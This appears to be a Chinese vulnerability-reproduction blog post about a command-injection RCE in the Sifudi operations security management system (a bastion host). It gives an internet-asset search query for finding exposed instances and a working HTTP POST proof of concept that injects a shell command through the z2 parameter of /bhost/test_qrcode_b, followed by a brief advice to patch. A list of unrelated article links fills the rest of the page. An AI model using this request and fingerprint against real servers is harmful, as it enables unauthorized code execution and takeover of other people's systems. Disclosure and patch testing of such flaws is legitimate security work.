当前位置: 首页 > news >正文

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

news 来源:原创 2024/5/14 12:03:29

产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机

漏洞描述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器

资产测绘

banner=“Set-Cookie: bhost=” || header=“Set-Cookie: bhost=”
在这里插入图片描述

漏洞复现

POC如下:

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|id;"&z3=bhost

在这里插入图片描述

修复建议

厂商已发布了漏洞修复程序,请及时关注更新
http://www.logbase.cn/

相关文章:

  • 【FPGA】Verilog 实践:优先级编码器 | Priority encoder
  • 一个实用的Wrapper类,解决mfc使用sqlite3时的中文乱码问题
  • W5500-EVB-Pico评估版介绍
  • 二、C#基础语法( 异常处理)
  • 使用JAVA Zookeeper构建分布式键值存储
  • STM32移植LVGL图形库
  • ❀My排序算法学习之选择排序❀
  • 【Linux】线程池设计/单例模式/STL、智能指针与线程安全/读者写者问题
  • PostgreSQL10数据库源码安装及plpython2u、uuid-ossp插件安装
  • 1、TCP 和 UDP 区别? 2、TCP/IP 协议涉及哪几层架构? 3、描述下 TCP 连接 4 次挥手的过程?为什么要 4 次挥手?
  • Guava的Joiner的日常使用
  • 多维时序 | MATLAB实现SSA-BiLSTM麻雀算法优化双向长短期记忆神经网络多变量时间序列预测
  • 隧道代理HTTP工作原理:一场奇妙的网络魔法表演
  • Hadoop(2):常见的MapReduce[在Ubuntu中运行!]
  • python高级代码
  • Essential Studio for ASP.NET Web Forms 2017 v2,新增自定义树形网格工具栏
  • open-falcon 开发笔记(一):从零开始搭建虚拟服务器和监测环境
  • react 代码优化(一) ——事件处理
  • spark本地环境的搭建到运行第一个spark程序
  • vue 配置sass、scss全局变量
  • 大快搜索数据爬虫技术实例安装教学篇
  • 大整数乘法-表格法
  • 在weex里面使用chart图表
  • ​LeetCode解法汇总2808. 使循环数组所有元素相等的最少秒数
  • ​卜东波研究员:高观点下的少儿计算思维
  • # Panda3d 碰撞检测系统介绍
  • ###51单片机学习(2)-----如何通过C语言运用延时函数设计LED流水灯
  • #define
  • (C#)一个最简单的链表类
  • (pojstep1.1.2)2654(直叙式模拟)
  • (ZT)薛涌:谈贫说富
  • (二)丶RabbitMQ的六大核心
  • (附源码)ssm高校志愿者服务系统 毕业设计 011648
  • (附源码)计算机毕业设计SSM保险客户管理系统
  • (机器学习-深度学习快速入门)第一章第一节:Python环境和数据分析
  • (一)使用IDEA创建Maven项目和Maven使用入门(配图详解)
  • (译) 理解 Elixir 中的宏 Macro, 第四部分:深入化
  • (转)视频码率,帧率和分辨率的联系与区别
  • ***监测系统的构建(chkrootkit )
  • .bat批处理(九):替换带有等号=的字符串的子串
  • .NET CORE Aws S3 使用
  • .netcore如何运行环境安装到Linux服务器
  • .pop ----remove 删除
  • /etc/sudoers (root权限管理)
  • @reference注解_Dubbo配置参考手册之dubbo:reference
  • @软考考生,这份软考高分攻略你须知道
  • [20170705]lsnrctl status LISTENER_SCAN1
  • [BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn
  • [BUUCTF]-PWN:[极客大挑战 2019]Not Bad解析
  • [bzoj 3124][sdoi 2013 省选] 直径
  • [bzoj1006]: [HNOI2008]神奇的国度(最大势算法)
  • [cocos creator]EditBox,editing-return事件,清空输入框
  • [CUDA 学习笔记] CUDA kernel 的 grid_size 和 block_size 选择
  • [Linux]history 显示命令执行的时间
  • [Linux]如何理解kernel、shell、bash